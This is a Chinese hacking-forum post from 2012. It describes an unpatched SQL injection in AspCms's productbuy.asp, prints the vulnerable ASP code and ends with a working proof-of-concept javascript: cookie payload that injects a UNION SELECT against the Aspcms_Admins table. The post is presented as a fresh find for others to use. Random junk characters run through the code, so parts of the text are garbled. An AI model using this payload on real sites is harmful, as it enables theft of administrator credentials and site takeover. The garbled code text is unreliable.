好久没上土司了,上来一看发现在删号名单内.....
6 X$ Z8 o8 W6 T; h) H; D; G# y也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
2 L: N2 L8 B+ ]8 {废话不多说,看代码:5 F5 g8 [9 X0 A# @
! @! _& T( K8 B# e* P$ F<%
& |7 z, H0 p( A0 I7 o+ ^0 w4 s* v) }; ^2 ]
if action = "buy" then% ]0 N" n7 I: c- k; ~ y
4 w5 @& r- z* a9 Q- K0 J" S5 e8 I5 i addOrder()
0 m3 ?$ j& B& v7 Q; N: d) a
' J# O7 Y% }8 Q \" F$ B" A5 b# Pelse
) r. I3 ]" V' ^9 {: F2 {% q4 Q9 F5 Y6 U0 j# O- g4 X
echoContent()
4 I/ e, q/ ?! z% X9 \6 @
. j1 A; C: \' C2 J3 O" ?6 Q2 Yend if; R; C5 {6 |( k* n" W" p6 E& C
- ~5 j9 x$ ~2 h1 [* j7 x6 o% B" Q r, t D+ [/ m; W. T
& S0 I9 q7 t5 x" N
……略过
- R, \- Q! o6 X" B* k$ J
- ?+ N! i2 x6 p) L
% A& Y7 ~* _6 N3 z2 t4 z8 A/ j" U
Sub echoContent()$ n+ K' y: B; L: K, o1 g% I
8 R- {( @4 V$ w0 R! w$ X4 l
dim id4 [' J4 N% s! H0 A! r; p
2 \: X5 K/ f( b9 v& B p0 b3 [
id=getForm("id","get")
, `* }; v4 ]* u5 P% W- v* G* e5 W' ^2 w
8 M d" k. b! g% j9 j" |4 N$ s
% y* j1 j' u8 i/ ~6 M, Z! o if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
7 s2 a3 C+ @' f; q0 ]+ |' [' F w5 s9 `+ c5 q" ?* L/ y
8 }" F [: o$ S3 W4 W" d; @* G6 G" w
: f: _5 \: T: @ ^! l& K dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")% l; g6 k; t: [* W4 S
$ i7 j9 D: `1 i$ l1 p. x1 u dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
. {2 `* _! O7 |) f
- ^0 I2 d5 c7 V0 G' z9 i8 a, z% A; w Dim templatePath,tempStr
: n$ g6 D# M6 j0 B$ ^5 z& E4 z
0 z3 {8 _( m) _& z; k: V) l templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
3 Z' t. Y; [; {6 n& }/ L0 {& R+ B2 r9 ~* ?8 Q2 B% z
: v# j7 K8 _5 D6 @8 ^) ~* f; k5 }- A
3 U" U( M$ Z3 K set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
. X6 Z4 C! l" W) t/ m/ s- d: R/ D$ d5 Z0 }- Q( R( [$ O/ u5 p
selectproduct=rsObj(0)! ~0 q* f/ _& p9 _
6 ]7 F: c* G2 u6 g, l1 B
0 l4 x1 j" L) p" a/ T- d0 x
5 u( t+ @0 F; s! p9 Q# A6 y% {
Dim linkman,gender,phone,mobile,email,qq,address,postcode. m0 G7 G. K2 q
6 [: O0 U6 E7 y4 n2 b
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
1 O* q2 K+ A2 [8 ^/ Q O
% @$ R# v3 X3 y% c* k& P2 s if rCookie("loginstatus")=1 then ) e7 V6 o- y! C: E) C/ q; D
! g5 c7 {! l( X1 @( b2 U% ` G; C. n& c
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
9 |9 x: `% K* m4 {# j
- x3 O- K9 W5 @8 N- p7 G linkman=rsObj("truename")6 L/ t- Q7 b( m% j; t: t( j
; M0 i2 a" P7 j gender=rsObj("gender")) g2 w; g8 B+ O1 S0 _) Z
7 A- a; e, n8 t( P% B: ? phone=rsObj("phone")9 k- F% s. z8 @4 I/ y
2 k' y, ^* r% u9 K9 q" C+ P mobile=rsObj("mobile")
; {% c- }$ Z5 ^+ `- p+ Z% f s* t
- t3 R1 s. |& e- o, E) F6 p. O! W( | email=rsObj("email")- V; n& _8 t% [) u+ F" n
2 a# J! A$ o( X* O; W5 a
qq=rsObj("qq")
+ U4 `' m0 u6 o4 T4 i. o7 s1 y6 ^% A/ O
address=rsObj("address")& L9 k9 ?/ `; `+ r. N& P j" z" v
$ g# v) {7 f8 Q9 l
postcode=rsObj("postcode")4 J5 J8 }' k2 l! T; F% u
1 R, @7 P1 j0 s7 d else / `# `7 Q! y: x I' [8 R& b/ {; K) ^
7 x }+ C, @4 B- B gender=15 i+ c4 R% m8 U
6 u0 }( J7 x+ v# {9 M$ K end if
' O0 s2 h6 J/ D% G4 T* `6 E
$ z3 t% V" {: _+ d% l rsObj.close()
% l* ]. q* c$ ^0 a
* [+ N0 _8 n' B. o4 w2 Q# z- D
) m0 _" u" W! A' G6 ?
0 c# C2 i& H# L- M; @7 h with templateObj
3 o' f4 G' R) {, Z0 N( p3 T4 h2 J1 n+ n" h
.content=loadFile(templatePath) , I- _) Y' w& K, e
/ h# m& y) F8 B. {) { .parseHtml()7 ~, q6 d0 }& H: K% d% }
! ~7 Z& e0 X; {% a; ]; p& [0 {
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)" E4 W, S5 l" c1 j
$ L0 }: p3 y3 Y8 {0 i
.content=replaceStr(.content,"[aspcms:linkman]",linkman)
6 C0 G7 g* @7 l. K- L, S
( W& P1 @1 h3 m E( Z .content=replaceStr(.content,"[aspcms:gender]",gender) $ U" M5 t: w ^' k& X& h
. ]! b) X; N* X, b# F/ x6 B
.content=replaceStr(.content,"[aspcms:phone]",phone) % s. T6 J; O: \4 X0 G* A7 W; F
1 r; D4 t- X0 ^' I* k \
.content=replaceStr(.content,"[aspcms:mobile]",mobile) 1 _- y: K' d( r9 q- q# W8 k
. f9 U( N7 c) Y1 K& W2 l# z .content=replaceStr(.content,"[aspcms:email]",email)
* ^& w/ ]- _3 T- d6 w I6 d% [3 _4 w: C
.content=replaceStr(.content,"[aspcms:qq]",qq)
( m5 W! K" ?1 B! s/ k& a, R$ }
1 k7 ?0 T; V z6 Q/ H .content=replaceStr(.content,"[aspcms:address]",address) 9 P7 P9 V: h9 `
) ~* @' b; f( [
.content=replaceStr(.content,"[aspcms:postcode]",postcode)
6 H! N; ^1 d$ ?* e4 h7 H" n L1 l& Z `
.parseCommon()
1 O% J" `! b' `$ y2 l$ C. Y+ ?$ a% i; ?# |7 o( `
echo .content - r' i1 p$ E% ?9 c, Y2 F* t2 P
9 h P) ~' x$ o. l5 u4 H x+ ?0 W end with, z4 Z7 A0 L3 N, p
0 s) O4 j" A, g2 }8 R8 I, h; L
set templateobj =nothing : terminateAllObjects
+ l0 K* E3 t* M3 [- c$ m% t
) v% j( X8 c- sEnd Sub
6 x5 F- \8 V b# N/ S: K漏洞很明显,没啥好说的# ?, f3 `% Y" L1 W& [7 b$ ^% K0 d
poc:
9 b2 |! E$ b6 \( A( ]# \4 I8 ~5 ~5 v) ^
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子/ B, K2 N4 T6 s
5 y+ A# v2 t9 t. t |
发表于 2012-12-27 08:35:05
收藏
支持
反对